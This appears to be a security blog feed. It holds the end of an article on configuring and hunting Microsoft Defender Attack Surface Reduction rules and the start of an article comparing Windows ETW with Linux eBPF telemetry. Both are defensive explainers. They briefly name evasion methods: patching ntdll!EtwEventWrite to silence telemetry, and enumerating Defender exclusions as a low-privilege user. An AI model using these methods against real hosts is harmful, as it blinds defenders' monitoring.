Cloud Protection (MAPS) -- required for several rules including the prevalence-based executable rule and the ransomware advanced-protection rule [@ms-learn-asr-reference].
The Microsoft 365 Apps macros-from-the-internet-blocked-by-default policy [@ms-learn-internet-macros-blocked] [@ms-techcommunity-internet-macros-2022] -- the consumer-facing twin of ASR's Office rules; default-on for every Microsoft 365 tenant since the July 2022 staged rollout.
The Vulnerable Driver Blocklist [@ms-learn-driver-block-rules] -- default-on in Windows 11 22H2; sibling to the BYOVD ASR rule at the kernel-load edge.
EDR-in-block-mode [@ms-learn-edr-in-block-mode] -- only when Defender Antivirus is in passive mode (third-party AV is primary).
Sysmon -- for visibility into edges ASR does not block and for audit-trail corroboration of edges it does. (M1040 nominates ASR per-technique [@mitre-m1040]; M1042 does not mention Sysmon or ASR by name [@mitre-m1042] -- the pairing is practitioner consensus, not an M1042 nomination.)

Step 5 -- Track exclusions in source control

The exclusion list is the most common deployment-failure surface. Adding C:\Program Files\Vendor\ as an exclusion for one rule applies fleet-wide; over-broad exclusions are the dominant practical risk to the layer's integrity. Use Git or equivalent; review exclusions every quarter; demand a Jira ticket per exclusion with a sunset date.

Note: (1) Enable BYOVD, LSASS, and WMI persistence in Block mode (Standard protection -- start here). (2) Move the other sixteen rules through Audit, Warn, Block. (3) Hunt with DeviceEvents | where ActionType startswith "Asr". (4) Layer with Tamper Protection, Cloud Protection, the Microsoft 365 Apps macro default block, the Vulnerable Driver Blocklist, EDR-in-block-mode (for passive AV), and Sysmon. (5) Track exclusions in source control with sunset dates.

Note: Exclusions added to one ASR rule apply fleet-wide. Over-broad exclusions are the dominant practical attack surface against an otherwise well-configured ASR posture. Adam Svoboda's published technique demonstrates that low-privilege users can enumerate the exclusion list directly from Defender's VDM containers [@adamsvoboda-asr-exclusions]. Track exclusions in source control. Review quarterly. Require a ticket with a sunset date for every entry.

If LSA Protection (RunAsPPL) is enabled on the device, the LSASS ASR rule shows as "not applicable" because LSA Protection already enforces the same boundary at a different layer [@ms-learn-asr-overview]. Confused defenders sometimes interpret the "not applicable" state as a rule misconfiguration; it is in fact the correct behaviour, and means the host is already protected against the equivalent class of attacks by LSA Protection plus Credential Guard.

```powershell Set-MpPreference -AttackSurfaceReductionRules_Ids ` '56a863a9-875e-4185-98a7-b882c64b5ce5', ` '9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2', ` 'e6db77e5-3df2-4cf1-b95a-636979351e5b' ` -AttackSurfaceReductionRules_Actions Enabled, Enabled, Enabled Get-MpPreference | Select-Object -ExpandProperty AttackSurfaceReductionRules_Ids ``` Run as administrator. The three GUIDs are BYOVD, LSASS, and WMI persistence respectively. Confirm with the Get-MpPreference call. For staged rollout in an enterprise, manage these through Intune or Group Policy instead so the configuration follows the device.

Five steps, three Standard protection rules, sixteen Other ASR rules, two rules that skip Warn mode, one universal hunting query. The rest is exception-list discipline. Section 11 closes with the seven misconceptions that survive every rollout.

11. Frequently Asked Questions

No. ASR rules live inside **Microsoft Defender Antivirus** -- the on-host scanning engine that ships free with every Windows edition that includes Defender. **Microsoft Defender for Endpoint** is the cloud-managed EDR layer Microsoft sells on top, with `DeviceEvents` Advanced Hunting, Indicators of Compromise management, and automated investigation. ASR rules can be configured locally via PowerShell or Group Policy with no Defender for Endpoint licence at all. Defender for Endpoint adds management, telemetry ingestion, and Advanced Hunting; it does not add the enforcement [@ms-learn-asr-reference] [@ms-learn-edr-in-block-mode]. No. This is the SOC-playbook folklore that survives every rollout. Each rule emits a rule-specific `AsrAudited` and `AsrBlocked` pair (the server-only Webshell rule is the only exception, with no `DeviceEvents` row at all). The canonical universal Advanced Hunting query is `DeviceEvents | where ActionType startswith "Asr"`, not equality against a generic value. Microsoft Learn's rules reference enumerates every pair [@ms-learn-asr-reference]. No. The Office macro era ended through three layers in combination: (1) **Europol's Operation LadyBird** on January 27, 2021, the coordinated international takedown of Emotet's command-and-control infrastructure [@europol-emotet-disrupted-wayback]; (2) **ASR's 2017-onward Office rules at the enterprise tier**, managed through Intune, Group Policy, or Defender for Endpoint; (3) **the Microsoft 365 Apps internet-macro default block at the consumer and tenant tier**, announced by Tom Gallagher on February 7, 2022 and resumed July 20, 2022 after a brief pause for usability fixes [@ms-techcommunity-internet-macros-2022]. ASR is the enterprise-managed layer. It was not the only layer. The honest version of the story names all three. Partially yes, and the nuance matters. The interception point (`WdFilter.sys`, registered at altitude 328010 in the FSFilter Anti-Virus band per the IFS allocated-altitudes reference [@ms-learn-ifs-allocated-altitudes]) is **kernel-mode**. The policy evaluation (`MsMpEng.exe`) is **user-mode** at integrity level System. Calling ASR "kernel-mode" without nuance is incomplete; the correct one-line framing is "kernel-mediated interception, user-mode policy evaluation." No. Microsoft Learn's overview page states verbatim: "If you enabled Local Security Authority (LSA) protection (recommended, along with Credential Guard), this rule is redundant" [@ms-learn-asr-overview]. The LSASS ASR rule shows as "not applicable" on devices where LSA Protection is enabled. The "not applicable" state is the correct behaviour, not a misconfiguration. No. Only two ASR rules skip Warn mode -- "Block credential stealing from the Windows local security authority subsystem" and "Block Office applications from injecting code into other processes" -- both per Microsoft Learn's overview page [@ms-learn-asr-overview]. Section 4 Generation 3 walks the byte-level proof that the rest of the catalogue (including the Safe Mode reboot rule and the copied-tools rule, two of the five rules the folklore wrongly lists) does support Warn. Yes -- routinely. The "the SOC never sees ASR" framing is rhetoric, not reality. Multiple rules raise EDR alerts in Defender for Endpoint; every rule except the Webshell rule lands a row in `DeviceEvents` [@ms-learn-asr-reference]. The accurate framing is that ASR blocks rarely require analyst response because there is nothing left to triage once the kernel has returned the operation as failed -- the Frankfurt analyst from this article's opening never gets paged because the macro never spawned PowerShell. The SOC can hunt, audit, and report on ASR activity at any time; the choice not to triage individual blocks is exactly what a well-tuned preventive layer ought to enable.

Nine years, seven generations, nineteen rules, one structural pivot from nodes to edges, and the same Cohen-1984 ceiling that every behaviour-block list inherits. The Frankfurt analyst from this article's opening never knew the macro fired -- because the kernel made sure nothing happened. That is the article in one sentence: a quiet layer that converts a credential-stealing-banking-trojan-turned-loader campaign into a single-row telemetry event the SOC routinely ignores, by classifying edges instead of nodes.

eBPF vs ETW: Two Generations of Kernel Observability

noreply@paragmali.com (Parag Mali) — Sat, 16 May 2026 00:00:00 GMT

**ETW (Windows 2000) is event emission only.** Per-CPU lock-free ring buffers, manifest-defined providers, kernel-mediated dispatch. Sessions filter by provider, keyword, and level; every enabled event is fully serialized and crosses the kernel/user boundary.

eBPF (Linux 2014) inverts the model. The consumer ships verified bytecode into the kernel; programs filter and aggregate at the hook site before any data crosses the boundary. JIT-compiled, with hooks across kprobe, uprobe, tracepoint, XDP, TC, and LSM.

The verifier is the trust boundary -- and the catch. Rice's theorem says no in-kernel verifier can be simultaneously sound, complete, and decidable. Linux's verifier trades soundness in the corner cases (CVE-2023-2163 and three predecessors); PREVAIL (the verifier used by eBPF-for-Windows) trades completeness more heavily for stronger formal grounding.

eBPF-for-Windows is the first cross-OS-portable kernel-observability primitive. PREVAIL verifies in user mode, bpf2c transliterates verified bytecode to C, MSVC compiles to a signed .sys driver. Networking-subset hooks only as of 2026; full kprobe-equivalent coverage is the work in progress.

1. The SOC Analyst Sees the Same Thing Twice

A Security Operations Center analyst opens two Sysmon/Operational event channels side by side. One channel is streaming from a Red Hat Enterprise Linux host; the other is streaming from a Windows Server 2022 domain controller. The XML configuration is the same. The Event IDs are the same. A ProcessCreate record from either host carries the same Image, CommandLine, ParentImage, IntegrityLevel, and Hashes fields. Detection rules written against one channel match the other. To the analyst, the two operating systems are interchangeable.

Underneath, they are not even close.

On the Windows side, every event was emitted by a kernel provider -- Microsoft-Windows-Sysmon, Microsoft-Windows-Threat-Intelligence, Microsoft-Windows-Kernel-Process -- before the Sysmon user-mode service ever ran its XML filter. The kernel produced a fully formatted event, dropped it into a per-CPU ring buffer, and let user space pick it up. Every enabled event made the kernel-to-user trip in full. The filter inside Sysmon's user-mode service is what kept the on-disk log small. The wire between the kernel and the consumer carried the full firehose.

On the Linux side, no kernel module owned by Microsoft is running. The same Sysmon binary is attached to roughly twenty Linux kernel probes through the SysinternalsEBPF library [@github-com-microsoft-sysmonforlinux]. Each probe is an eBPF program: bytecode that was compiled by clang, verified by the kernel before load, JIT-compiled to native instructions, and attached to a hook inside the kernel [@ebpf-io-is-ebpf]. When execve fires, the verified program runs on the producing CPU, reads its arguments out of the kernel context, decides whether the call matches the XML configuration's predicates, and -- only then -- writes a record into a ring buffer. The events that arrive in user space were already filtered inside the kernel. The wire carries only what the configuration cares about.

The output channels match because Sysmon for Linux is engineered to look exactly like Sysmon for Windows [@github-com-microsoft-sysmonforlinux]. The substrate underneath is engineered for two different decades. ETW is from 2000. eBPF is from 2014. The fourteen-year gap shows up not in features but in how the kernel does its job.

Key idea: ETW emits. eBPF computes. That gap is the entire generation difference. Everything else in this article is a consequence of it.

This article is about why those two designs exist, why the second one is strictly more powerful, why "strictly more powerful" cost the Linux kernel a new class of CVE, and what Microsoft's microsoft/ebpf-for-windows [@github-com-for-windows] project -- now in its sixth year of development -- reveals about which design wins at the point of convergence. By the end you will know both substrates well enough to choose between them, understand their failure modes, and see why "two generations" is not marketing language but a literal description of the engineering arc.

2. A Tale of Two Lineages

In 1992, Van Jacobson and Steven McCanne at Lawrence Berkeley Laboratory wrote a small virtual machine for packet filtering [@tcpdump-org-bpf-usenix93pdf]. In 2000, a separate Microsoft team shipped a kernel event bus inside Windows 2000. Neither group knew the other existed. Each was solving a different version of the same problem: how do you watch the kernel from user space without owning the kernel?

The two answers ran in parallel for twenty-two years before they collided.

1992 -- The BSD Packet Filter. McCanne and Jacobson published "The BSD Packet Filter: A New Architecture for User-level Packet Capture" at USENIX Winter 1993, describing work that landed in 4.3BSD-Reno earlier in 1992. The motivation was painfully concrete: tcpdump was copying every packet through the kernel-user boundary, then discarding the ones the user did not want. BPF moved that filter into the kernel. A tiny two-register, 32-bit virtual machine evaluated a user-supplied predicate against each packet before any copy; only matching packets crossed into user space. The architectural insight that would survive thirty years is one sentence: filter where the data is produced, not where it is consumed.

A safe, sandboxed virtual machine inside the Linux kernel that runs user-supplied programs at attached hook points. Programs are written in restricted C, compiled to a 64-bit RISC-style bytecode, statically verified before load, and JIT-compiled to native code. The "extended" version, introduced in Linux 3.18 (December 2014) [@kernel-org-bpf-indexhtml], generalized BPF from a packet-filter language into a general kernel-extensibility mechanism.

2000 -- Event Tracing for Windows. Microsoft shipped ETW with Windows 2000. The reference portal [@learn-microsoft-com-tracing-portal] describes the design Microsoft had been refining since the late 1990s: a kernel-mediated event bus with three roles -- providers, sessions, and consumers -- and per-CPU lock-free ring buffers. ETW's architectural insight was the inverse of BPF's: event identity and causal order are first-class. A kernel-mediated dispatch makes them cheap. A tcpdump filter wants to throw events away. A security telemetry system wants to keep them, attribute them, and order them.

A kernel-mediated tracing facility shipped in Windows 2000. Providers (kernel or user-mode components) emit structured events to per-CPU ring buffers; sessions own the buffers and select which providers to enable at which level; consumers receive the event stream either in real time or by reading the on-disk `.etl` log. ETW is documented at `learn.microsoft.com/.../etw/event-tracing-portal` [@learn-microsoft-com-tracing-portal].

2003-2005 -- DTrace. Bryan Cantrill, Mike Shapiro, and Adam Leventhal at Sun Microsystems started work in 2003 on what would become the first production-grade dynamic tracing system. DTrace shipped publicly in Solaris 10 in January 2005 [@en-wikipedia-org-wiki-dtrace] and quickly ported to FreeBSD and macOS. Its central idea -- safe in-kernel scripts attached to probes, with a single language for tracing the entire system -- is the spiritual ancestor of every modern kernel observability tool, including eBPF.Wikipedia gives DTrace's initial public release as January 2005, with Sun's internal development starting around 2003. The "DTrace 2003" claim that appears in some retrospectives conflates project inception with public release; we use the 2005 ship date here and note 2003 only as a development start. Linux could not adopt it directly: DTrace is licensed under the CDDL, which is GPLv2-incompatible.

2005 -- SystemTap. Red Hat attempted to fill the Linux DTrace gap with SystemTap [@sourceware-org-systemtap]. The architectural compromise that doomed it: SystemTap scripts compile to a kernel module, loaded at runtime. Allowing user-supplied kernel modules to be loaded on demand is a privileged operation by definition, so production SystemTap deployments restricted use to local root. That made the observability case study moot: if you already have root, you can use any debugging tool. SystemTap survives as a niche tracing system; it did not become the Linux answer to DTrace.

1992-2014 -- classic BPF stagnates. The original BPF VM kept finding new jobs. Linux Socket Filtering [@kernel-org-networking-filtertxt] ported the BSD filter into the Linux kernel in 1997. seccomp-bpf in 2012 gave it a second job: filtering system calls for sandboxing. But the language remained a 32-bit two-register packet-filter VM. It could not be extended to general kernel observability without rewriting the instruction set architecture from the ground up.

2014 -- eBPF. Alexei Starovoitov's "extended BPF" patch series landed in Linux 3.18 in December 2014 [@kernel-org-bpf-indexhtml], described in LWN's contemporaneous article on Starovoitov's eBPF patch set [@lwn-net-articles-603983]. The rewrite was thorough: 64-bit instruction set, eleven registers, maps for in-kernel state, helper calls into kernel APIs, a JIT compiler, and -- the part that mattered most -- a kernel verifier that statically proves safety before any program runs. The verifier is what turned the packet filter into a general kernel extension mechanism. Without it, every BPF program would have to be trusted; with it, untrusted user code can execute in kernel mode.

By the time eBPF shipped, Windows had ETW everywhere. Linux had auditd's pull-based audit log and a handful of perf events. Then Starovoitov rewrote BPF, and the architectural balance shifted overnight. The next decade of Linux observability was built on the new instruction set. The next decade of Windows observability stayed on ETW. The two designs ran in parallel until 2021, when Microsoft announced that eBPF would also run on Windows.

flowchart LR A[BPF -- 1992 -- LBL] B[ETW -- 2000 -- Windows 2000] C[DTrace -- 2005 -- Solaris 10] D[SystemTap -- 2005 -- Red Hat] E[seccomp-bpf -- 2012 -- Linux 3.5] F[eBPF -- 2014 -- Linux 3.18] G[BPF Trampoline -- 2019 -- Linux 5.5] H[BPF Ringbuf -- 2020 -- Linux 5.8] I[eBPF for Windows -- 2021 -- Microsoft] J[RFC 9669 BPF ISA -- 2024 -- IETF] A --> B --> C --> D --> E --> F --> G --> H --> I --> J

The diagram lays the substrate stories side by side. Each arrow is an architectural decision that constrained what came after. The next two sections walk each design end to end -- ETW first, because it is older and emission-only and easier to internalize.

3. ETW: Pure Event Emission

A natural question that turns out to be the wrong one: why didn't Microsoft just keep extending performance counters? By the late 1990s, Windows already had a mature counter facility -- perfmon, the Windows Performance Counters portal [@learn-microsoft-com-counters-portal]. It exposed CPU percentage, page-fault rate, queue lengths, and hundreds of other scalar metrics. If you wanted to know how loaded your system was, perfmon told you.

It also told you almost nothing useful for security telemetry.

Three structural failures of the counter model show up the moment you try to use it as the substrate for an EDR.

Sampling-rate floor. A counter can only be observed at the rate the consumer queries. On a busy host -- sshd children, container init forks, a CI runner -- process-creation rates routinely exceed any sane query rate. The counter aggregates the events it cannot expose into a single integer that hides the structure of what happened.
No identity. "Three hundred process creations in the last second" is a counter. "User bob ran /tmp/.x with parent /usr/sbin/cron at 14:33:07.221Z" is an event. The security model requires identity; the counter model erases it.
No causal order. Two counters sampled in sequence are not causally ordered with respect to the system events they describe. ETW's per-CPU buffers with QPC timestamps preserve causal order across CPUs to within the timer's accuracy.

The fix was not a faster perfmon. The fix was an entirely different shape of telemetry. ETW was that shape: push-based, per-event, kernel-attributed, with stable schemas declared up front. The contrast between perfmon (a sampling counter) and ETW (an event bus) is not parametric. The two systems answer different questions. Security needs the event-bus answer.

Provider, session, consumer

ETW's data plane has three roles, every one of them a kernel-mediated object.

A provider is a kernel or user-mode component that calls EventWrite or EtwWrite to emit a structured event. Providers identify themselves by GUID. They declare the schema of their events ahead of time: classic providers via MOF, the Vista-and-later manifest format [@learn-microsoft-com-event-tracing] called WEVT, or TraceLogging [@learn-microsoft-com-logging-portal] for self-describing events. The schema is part of the contract: a consumer that knows the provider's manifest knows the field layout of every event the provider will ever emit.

A session is a kernel object created by StartTrace. It owns a set of per-CPU buffers and a list of enabled providers, with per-provider level and keyword masks. Sessions can write events to disk (.etl files) or be consumed in real time.The .etl file extension stands for "Event Trace Log." It is the on-disk format read by Windows Performance Analyzer and by tracerpt.exe for post-hoc analysis.

A consumer is a user-mode process that calls OpenTrace and ProcessTrace and receives event callbacks. EDR agents like Sysmon, Defender, and the third-party agents that ship with Microsoft Defender for Endpoint [@learn-microsoft-com-defender-endpoint] are real-time consumers.

ETW's three-role architecture. *Providers* emit events into per-CPU ring buffers. *Sessions* are kernel objects that own buffers and select which providers to enable. *Consumers* are user-mode processes that read the buffers in real time or open the on-disk `.etl` file. The taxonomy is defined in the ETW provider documentation [@learn-microsoft-com-event-tracing].

The per-CPU ring buffer

The algorithmic core of ETW is a per-CPU lock-free ring buffer. When a provider on CPU 3 calls EventWrite, the kernel formats the event according to the provider's manifest, stamps it with a QPC timestamp, and memcpys the result into the per-CPU buffer for CPU 3. A kernel writer thread drains the buffer asynchronously into the session's destination -- either an .etl file on disk or a consumer's callback queue. The producer-side cost is constant: a function call plus a buffered memcpy, all on the local CPU, with no cross-CPU synchronization.

The Windows monotonic timestamp source used for ETW event timestamps. QPC is backed by hardware timers (TSC on modern x86, generic counter on ARM64) and provides a high-resolution counter that does not go backward.

QPC guarantees monotonic timestamps per CPU.QPC is monotonic per CPU on modern hardware, but cross-CPU ordering still relies on the kernel writer thread's serialization when events from different CPUs are merged into a single output stream. Per-event timestamps from different CPUs can be ordered after the fact, but the merge happens in the writer, not in the producer.

flowchart LR P1[Provider on CPU 0] P2[Provider on CPU 1] P3[Provider on CPU 2] B0[Per-CPU buffer 0] B1[Per-CPU buffer 1] B2[Per-CPU buffer 2] W[Kernel writer thread] S[Session] F[.etl file] C[Real-time consumer] P1 -- EventWrite --> B0 P2 -- EventWrite --> B1 P3 -- EventWrite --> B2 B0 --> W B1 --> W B2 --> W W --> S S --> F S --> C

The cost story

Microsoft's reference portal [@learn-microsoft-com-tracing-portal] describes ETW as "high-volume, low-overhead." That qualitative claim has been the consensus practitioner finding for two decades. The most useful practical writeup is Bruce Dawson's ETW Central index [@randomascii-wordpress-com-etw-central], which links to more than forty blog posts on real ETW deployments and measurements. The honest summary, anchored to Dawson's practical experience plus the architectural reason (per-CPU lock-free buffers and a memcpy per event), is that typical telemetry configurations sit in the low single-digit-percent CPU range, and pathological "log everything" configurations can reach measurable user-visible slowdowns -- on the order of 5-10% in the worst cases. These are practitioner estimates, not benchmarked figures; the BenchmarkDotNet documentation [@benchmarkdotnet-org-configs-diagnosershtml] for the EtwProfiler diagnoser explicitly acknowledges the cost: "In order to not affect main results we perform a separate run if any diagnoser is used." The overhead is small but it is not zero.

The cost has a structural cause. ETW has no in-kernel filter. The producer pays the full event-formatting cost on every emission, and the only filter is the session's level and keyword mask. If you enable a provider, every event that provider emits flows through the buffer. Filtering happens at the consumer, in user mode, after the event has crossed the boundary.

The Threat-Intelligence provider

ETW providers are not equal. The most architecturally important one for security is Microsoft-Windows-Threat-Intelligence, a kernel-only provider that emits signals only the kernel can see: image loads, remote-thread creations, VirtualProtect changes that flip memory from data to executable. Only a process running under Protected Process Light with the AntiMalware signer [@learn-microsoft-com-downloads-sysmon] can subscribe. That is why Defender, CrowdStrike Falcon, SentinelOne, and Carbon Black [@github-com-providers-docs] all run as PPL-Antimalware: it is the entry ticket to the kernel-only telemetry that distinguishes serious EDR from script-level monitoring.

Note: ETW's biggest weakness is that providers run inside the very process they are observing. A process can patch its own copy of ntdll!EtwEventWrite with a ret instruction and silence its own emissions before they reach the kernel buffer. EDR vendors monitor for this integrity violation out of band, treating the patch itself as a high-confidence detection signal. The very existence of the tell is an admission that ETW's original design assumed an honest user-mode producer -- a reasonable assumption in 2000, increasingly untenable in 2025.

Sysmon 6.20 [@learn-microsoft-com-downloads-sysmon], released in 2018, was the version that tied ETW into the modern EDR stack as a turnkey configuration.The 2018 Sysmon 6.20 release added the configuration schema that the cybersecurity community converged on. By 2026, the same XML configuration -- including the ProcessCreate, NetworkConnect, ImageLoad, and FileCreate event IDs -- works on both Sysmon for Windows and Sysmon for Linux. Sysmon, Microsoft's own free reference consumer authored by Mark Russinovich and Thomas Garnier [@learn-microsoft-com-downloads-sysmon], demonstrated that an XML configuration plus an ETW consumer plus protected-process status was enough to build a useful EDR. Sysmon is not Defender; it is the open shape that the commercial EDR vendors built proprietary versions of.

Closing on ETW

ETW emits. Every enabled event crosses the kernel-user boundary, fully formatted, with no in-kernel filtering language whatsoever. The session's level and keyword mask is a coarse on/off switch, not a programmable filter. Aggregation, sampling, and stack-trace folding happen in user mode, after the event is already across the boundary.

Now you can read the question that drove Starovoitov's 2014 rewrite: what if you could filter in the kernel itself? What if you could compute -- not just emit?

4. eBPF: Programmable In-Kernel Computation

The architectural inversion is one sentence. ETW is the producer telling the consumer what happened. eBPF is the consumer telling the producer what to compute. The producer is the kernel; the consumer is a user-mode process that has compiled, verified, and attached a small program that will run inside the kernel at a chosen hook. The roles are inverted, the data flow is inverted, and the trust model is inverted.

The lifecycle

A canonical eBPF program goes through six stages before it does any useful work. The flow below is the same on every Linux kernel since 3.18, with refinements added over the years for BTF (BPF Type Format), CO-RE (Compile Once, Run Everywhere), and link primitives:

1. clang -target bpf -O2 -c prog.c -o prog.o            # ELF with BTF
2. fd = bpf(BPF_PROG_LOAD, &attr)                       # kernel verifier runs
3. for each map referenced:
       map_fd = bpf(BPF_MAP_CREATE, &attr)
4. link = bpf(BPF_LINK_CREATE, kprobe|tracepoint|xdp|lsm|cgroup, fd)
5. at hook fire: JIT-compiled native code runs on the
   producing CPU, reads context, calls bpf_* helpers,
   writes to map or ringbuf
6. user space mmaps the ringbuf and consumes records

The lifecycle is documented in the canonical kernel BPF documentation index [@kernel-org-bpf-indexhtml]. It is worth lingering on stage 2. Between the user-space bpf() syscall and the moment the kernel hands back a file descriptor for the loaded program, a static analyzer runs. That analyzer is the most consequential piece of code in this entire article. We treat it on its own in section 5.

flowchart TD A["Restricted C source -- (prog.c)"] B["clang -target bpf -- BPF ELF + BTF"] C[bpf BPF_PROG_LOAD] D[Kernel verifier] E[JIT compiler] F[Kernel hook] G[bpf BPF_MAP_CREATE] H["BPF maps -- (arrays, hashes, ringbuf)"] I["bpf BPF_LINK_CREATE -- (kprobe/xdp/lsm/...)"] J[Hook fires] K[User space mmap ringbuf] A --> B --> C --> D D -->|reject| Z[E_INVAL to userspace] D -->|accept| E --> F C --> G --> H F --> I --> J J --> H H --> K

Hooks: where programs attach

The thing that distinguishes eBPF from a packet filter is its hook surface. A hook is a place inside the kernel where a verified program can be attached, fired at the moment something happens. Linux has a lot of hooks.

An attachment point in kernel code where a verified eBPF program runs. Different hook types receive different context arguments: a kprobe receives the function's CPU registers; an XDP program receives a packet buffer; an LSM hook receives the security operation's parameters. The hook type also determines what helpers and map types the verifier allows.

The hook taxonomy, drawn from the kernel BPF docs [@kernel-org-bpf-indexhtml] and Cilium's BPF architecture reference [@docs-cilium-io-bpf-architecture], is broad:

kprobe and kretprobe -- entry and return of any non-inlined kernel function.
fentry and fexit -- BPF trampoline replacement for kprobes, with no int3 trap-frame cost.
uprobe -- any user-space symbol in any process.
tracepoint -- stable kernel tracepoints with version-locked schemas.
perf_event -- sampling-profile hooks tied to perf events.
XDP -- driver tail-call, before allocation of an sk_buff.
TC -- Linux traffic-control qdisc hooks.
LSM -- Linux Security Module hooks (mandatory-access-control points), available since Linux 5.7.
cgroup, sched, sock_ops -- policy and socket-state hooks.

flowchart TD K["eBPF -- Programs"] T["Tracing -- (kprobe, fentry, -- uprobe, tracepoint)"] N["Networking -- (XDP, TC, sock_ops, -- sk_lookup)"] S["Security -- (LSM, seccomp, -- landlock)"] P["Policy & scheduling -- (cgroup, sched, -- perf_event)"] K --> T K --> N K --> S K --> P

That hook surface is what makes eBPF the universal Linux instrumentation substrate. Once a developer learns the load-verify-attach lifecycle, the same toolchain instruments a TCP retransmit, a do_sys_open call, an LSM file_open check, and an XDP fast-path drop -- all in the same language with the same verifier and the same JIT.

Maps: in-kernel state

The second piece of architecture eBPF adds over classic BPF is the map -- a kernel-managed key-value store accessible from inside a verified program and from user space. Maps are how eBPF programs hold state between invocations and how they communicate with user space.

A kernel-managed data structure that an eBPF program can read and write from inside the kernel, and a user-space process can read and write through the `bpf()` syscall. Common map types include hash, array, LRU hash, per-CPU hash, ring buffer, and program array (used for tail calls). Each map has a maximum capacity declared at creation and a verifier-checked size for keys and values.

The kernel hash-map documentation [@docs-kernel-org-bpf-maphashhtml] distinguishes shared and per-CPU variants. The decision between them is one of the consequential design choices in writing real eBPF code.

Map type	Cross-CPU semantics	Update cost	Memory cost	Best for
`BPF_MAP_TYPE_HASH`	One value per key, shared across CPUs	Atomic `__sync_fetch_and_add` or `BPF_F_LOCK` spinlock	`max_entries * (key_size + value_size)`	State that must be globally consistent
`BPF_MAP_TYPE_PERCPU_HASH`	Separate value slot per CPU	Non-atomic read-modify-write	`max_entries * value_size * num_cpus`	Counters and histograms where rate matters and snapshot consistency does not
`BPF_MAP_TYPE_RINGBUF`	Single MPSC ring with global FIFO order	Reservation-spinlock on producer	Fixed buffer	Event streams whose user-space order must match cross-CPU producer order

The per-CPU variant exists because cache-coherence cost on a contended hash slot dominates the time spent updating it; per-CPU maps remove that contention entirely at the price of cross-CPU consistency. A per-CPU counter on a 96-vCPU host occupies 96 * value_size bytes per key, but updates are local loads and stores. A shared counter on the same host is value_size bytes per key, but every increment is an atomic.

A multi-producer single-consumer kernel-to-user transport added in Linux 5.8 and documented at `docs.kernel.org/bpf/ringbuf.html` [@docs-kernel-org-bpf-ringbufhtml]. Unlike the legacy `perf_event_array` (one ring per CPU), the BPF ringbuf is a single ring shared across all CPUs, with cross-CPU producer ordering preserved in the user-visible record stream.

The ringbuf documentation [@docs-kernel-org-bpf-ringbufhtml] is explicit about why the design exists: "more efficient memory use by sharing ring buffer across CPUs; preserving ordering of events that happen sequentially in time, even across multiple CPUs (e.g., fork/exec/exit events for a task)." A security telemetry consumer that needs to see fork on CPU 0 before kill on CPU 1 cannot use a per-CPU ring; it needs a single MPSC ring. The trade-off is real: the producer pays a brief spinlock for slot reservation, where a per-CPU ring would pay nothing. For event streams the trade is worth it; for histograms it is not.

The aggregation pattern

The reason eBPF is strictly more powerful than ETW is captured in one bpftrace one-liner. The DSL bpftrace [@github-com-iovisor-bpftrace] -- inspired explicitly by DTrace -- compiles a single-line query into a verified eBPF program:

kprobe:vfs_read { @[comm] = hist(arg2); }

This program attaches to the vfs_read kernel function. For every call, it indexes a per-CPU map by the calling process's name (comm), buckets the arg2 value (the read length) into a power-of-two histogram, and increments the bucket. Nothing crosses the kernel-user boundary while vfs_read is firing -- not at 10K calls per second, not at 10M. When the user hits Ctrl-C, bpftrace iterates the per-CPU maps from user space, merges the buckets across CPUs, and prints a histogram.

ETW cannot do this. To produce the same histogram with ETW, a consumer would have to subscribe to every vfs_read-equivalent kernel event, receive each one in user mode, compute its bucket, and update an in-process histogram. The kernel-user wire would carry the full firehose. eBPF carries only the final histogram.

{` // The bpftrace one-liner: // kprobe:vfs_read { @[comm] = hist(arg2); } // lowers (conceptually) to this kernel-side and user-side flow.

// --- inside the kernel, at every vfs_read call --- function on_vfs_read(ctx) { const comm = bpf_get_current_comm(); const len = ctx.regs.rsi; // arg2: read length const bucket = log2(len); // 0..63

// per-CPU hash keyed by (comm, bucket); no cross-CPU atomics. const key = { comm, bucket }; const slot = percpu_map.lookup_or_init(key, 0); *slot += 1; }

// --- in user space, on Ctrl-C --- function print_histogram() { const merged = {}; for (const cpu of all_cpus) { for (const [key, count] of percpu_map.iter(cpu)) { merged[key] = (merged[key] || 0) + count; } } render_power_of_two_histogram(merged); } `}

The kernel-side per-event cost is a few instructions plus a non-atomic increment. The user-space cost is paid once, at print time. The wire between kernel and user carries one batch read of the entire per-CPU map. ETW's equivalent would carry every single vfs_read event in full.

The instruction-count and complexity limits

Two distinct limits constrain what the verifier will accept. The constants are easy to confuse, and earlier drafts of this article confused them. The correct distinction comes straight from the kernel headers.

BPF_MAXINSNS is defined as 4096 in include/uapi/linux/bpf_common.h. This is the maximum number of bytecode instructions per program for unprivileged callers. A program longer than 4096 instructions is rejected at load time regardless of what the verifier finds.

BPF_COMPLEXITY_LIMIT_INSNS is defined as 1,000,000 in kernel/bpf/verifier.c. This is the maximum number of explored states the verifier will visit during its symbolic execution. It applies to privileged callers with CAP_BPF, who are allowed to load larger programs but still bound the cost of verifying them.The two limits answer different questions. BPF_MAXINSNS = 4096 bounds the size of an unprivileged program. BPF_COMPLEXITY_LIMIT_INSNS = 1,000,000 bounds the cost of verification for privileged programs. Conflating them is a common error: production EDRs run with CAP_BPF plus CAP_PERFMON or root and load programs much longer than 4096 instructions, but the verifier's exploration is still bounded.

Linux 5.16 (March 2022) [@kernel-org-bpf-indexhtml] made kernel.unprivileged_bpf_disabled=1 the default.The change followed a series of verifier soundness CVEs, including CVE-2020-8835 and CVE-2021-3490, that were exploitable from unprivileged user space. Production EDRs run with CAP_BPF plus CAP_PERFMON or full root; the unprivileged path is reserved for sandboxed workloads where the kernel team has weighed the risk.

The JIT and the trampoline

Brendan Gregg's BPF Performance Tools [@brendangregg-com-tools-bookhtml], published by Addison-Wesley in 2019 (ISBN-13 9780136554820 [@pearson-com-p200000007897-9780136554820]), reports a 10x to 12x speedup of the JIT over the interpreter on x86-64. The number is qualitative -- the workload, the kernel version, and the program shape all matter -- but the order of magnitude is consistent across kernel docs and measurements. The JIT is what makes eBPF practically usable inside hot kernel paths.

A second performance refinement landed in 2019 with the BPF trampoline patch series. Starovoitov's v1 cover letter [@lore-kernel-org-1-astkernelorg] introduced fentry and fexit -- BPF program attach points that use a tiny JIT-emitted dispatcher to call the attached programs directly, rather than relying on kprobe's int3 trap mechanism. The framing is worth quoting:

Unlike k[ret]probe there is practically zero overhead to call a set of BPF programs before or after kernel function. -- Alexei Starovoitov, BPF trampoline cover letter [@lore-kernel-org-1-astkernelorg]

